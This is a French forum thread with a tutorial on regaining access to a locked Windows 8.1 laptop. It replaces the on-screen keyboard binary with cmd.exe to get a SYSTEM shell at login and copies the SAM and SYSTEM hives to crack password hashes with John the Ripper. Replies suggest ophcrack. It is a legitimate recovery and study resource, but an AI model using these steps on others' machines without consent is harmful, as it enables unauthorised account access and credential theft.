Vous n'êtes pas identifié(e).
Pages : 1
/!\ A faire dans le cas d'un dépannage ou d'un oubli, l'accès à une session utilisateur sans le consentement de l'utilisateur est interdit.
Contexte: hier j'ai eu a récupérer la session d'un client ayant perdu son mot de passe sous Windows 8.1 sur un portable ASUS F55EC, avec bios UEFI, disque dur en GPT et Secure Boot activé. J'expose la manière dont débloquer la situation si ca vous arrive. J'avais à ma disposition kali-linux 1.0.9 sur clé USB et kon-boot 2.4. Alors kon-boot s'étant bloqué avant le démarrage de Win, l'outil m'a pas été du grande aide, je passe à la suite.
[UEFI]
F2 -> acces au BIOS
Security > Secure Boot -> Disable
reboot
Boot -> CSM -> Enable
reboot
Boot -> #option1 -> ma clé usb avec kali
Quelques touches utiles sur ASUS F55EC:
F2: acces au BIOS
F9: acces au menu "de dépannage" permettant entre autres de choisir de booter sur sa clé USB, de refaire une restauration d'usine, d'accéder au mode sans échec, ...
[depuis kali]
fdisk -l /dev/sda
j'obtiens une erreur: fdisk ne peut pas lire les partitions sur GPT
gparted
detection de la partition C: -> ici : /dev/sda4
# monter la partition
ntfs-3g /dev/sda4 /mnt/ -o rw
cd /mnt/Windows/System32/
Dans mon cas je choisi de hack le clavier virtuel
#backup
cp osk.exe osk.bak
#remplacement
cp cmd.exe osk.exe
Quelques executables ayant un intéret pour l'utilisation de ce hack, tous se trouvent dans C:\Windows\System32\
* sethc.exe -> encore présent dans Win8.1 mais remplacé par EaseOfAccessDialog.exe
* Utilman.exe -> boite avec les options pour accessibilité (voir image en dessous) dont celui avant de se logger. Perso je ne la choisi pas mais je préfère utiliser les options utilisées par ce menu, ca permet de cumuler les "hacks" en donnant des commandes différentes par options. Si ce fichier est remplacé c'est tout le menu qui déclenchera la nouvelle action.
* EaseOfAccessDialog.exe -> touches rémanantes (sticky keys)
* osk.exe -> clavier virtuel
* Magnify.exe -> loupe
Faites attention à la casse, Windows aime bien les executables avec des majuscules, au pire vous avez la touche tabulation.
Quand les modifications sont faites, on démonte le tous et on redémarre sur Win:
cd /
umount /mnt/
reboot
[Retour a Win]
Comme j'ai dans cet exemple remplacé le clavier virtuel, je lance le clavier virtuel depuis le menu d'accessibilité et je tombe sur le command prompt:
Petite remarque:
Vous remarquerez que comme dans les précédentes versions de win ou le hack fonctionnait tout pareil avec sethc, vous êtes loggé en tant que SYSTEM, donc vous avez clairement full access. On voit très bien que M$ continue à répéter ses erreurs et tant mieux pour nous.
Si l'astuce fonctionne, utiliser les commandes suivantes:
net user
pour afficher la liste des utilisateurs et retrouver celui dont on souhaite modifier le pass
net user leUser *
ou
net user leUser passEnDur
pour fournir un nouveau pass au user, avec le * vous pourrez lui mettre un blank password
Du moins sur ma machine virtuelle avec win 8 cette astuce fonctionne, pour une certaine raison, cmd.exe était bloqué, probablement une sécurité depuis une mise à jour de Windows empechant le hack, cette étape ayant échoué je passe à l'étape suivante.
[crackage de la SAM]
alors à partir d'ici je vais pas remettre les commandes pour monter et démonter la partition, voir au dessus. Je considèrai par la suite que vous ayez déjà monté la partition contenant les fichiers système de windows.
#copie de %systemroot%/System32/config/ SAM et SYSTEM sur un dossier dont je vais pouvoir travailler dessus, ex: /root
cp /mnt/Windows/System/config/SAM /root
cp /mnt/Windows/System/config/SYSTEM /root
bkhive SYSTEM out
pwdump2 SAM out
copie des hash NT/LM dans un fichier pot
john --incremental --format=nt pot
cat .john/john.pot
Et j'ai retrouvé le passe que mon client avais perdu, je me log sur sa session et afin qu'il ne le perde plus, je lance dans un terminal la commande suivante: netplwiz, et je décoche la case demandant au user de donner son pass pour rentrer dans sa session, tout fini bien pour lui.
Finalement, retour a kali pour nettoyer les hack et remettre les fichiers dans leur états initial.
cd /mnt/Windows/System32/
cp osk.bak osk.exe
rm osk.bak
Hors ligne
Sympa le tuto, moi j'ai pas encore du essayer de retrouver un passe sur win 8.1 mais comme ça j'ai la soluce au cas ou.
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
Salut, sympa l'astuce merci aussi ! Mais je pense qu'il y a plus facile par exemple ophcrack.
Dans la doc ils disent:
Ophcrack can recover 99% of passwords from Windows 8
@ tester !
>> Good things come to those who, Wait.. <<
>> sip:yzeew@ekiga.net << and >> #Pouni3 <<
Hors ligne
j'avais testé ophcrack mais j'avais pas de rainbow tables, du coup j'ai utilisé john en incremental
Hors ligne
Les raimbow tables sont payantes sur ophcrack et pas toujours efficace pour les passe fr
Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D
Hors ligne
vraiment intéressant.
j'accroche le sujet, merci WarLocG.
PC: HP-pavilion a6227.fr | wifi: Awus036H et HWGUSB2-54 | CG: NVIDIA geforce 8400 GS | OS: Debian-8.1.0-i386 Xfce | EN TESTE kali-linux-openbox-rolling-i386.iso (KaliBang), bento-openbox-14.04.3-i386.iso et Viperr8_i686.iso
Hors ligne
Ce que je rajoute ici est un peu hors-sujet mais je pense a écrire un script en python pour supprimer des applications du Windows Store également, cela étant tant que j'ai pas confirmation que les appx soient réellement supprimés (et pas réinstallés ensuite par Windows) j'ai pas encore écrit le script.. mais ca facilitera un peu le traitement car powershell est vraiment imbuvable.. après les appx bouffent pas tant de ressources que ca non plus.. mais on s'écarte carrément du thème du forum la
@WangXiangzhai: bah y'a pas de quoi, quand je peux partager quelque chose d'interressant je le fait, surtout que ca sers aussi de pense-bête
Hors ligne
La technique est possible aussi via le system repair de windows mais bien joué War'
Mess With The Bests
Die Like The Rest
Hors ligne
Super Génial ce tutoriel...
Passionné par la Sécurité Informatique.
Le véritable ennemi de la connaissance n'est pas l'ignorance mais l'illusion de la connaissance.
La quête de la connaissance passe d'abord par l'humilité et ensuite la détermination.
Hors ligne
Pages : 1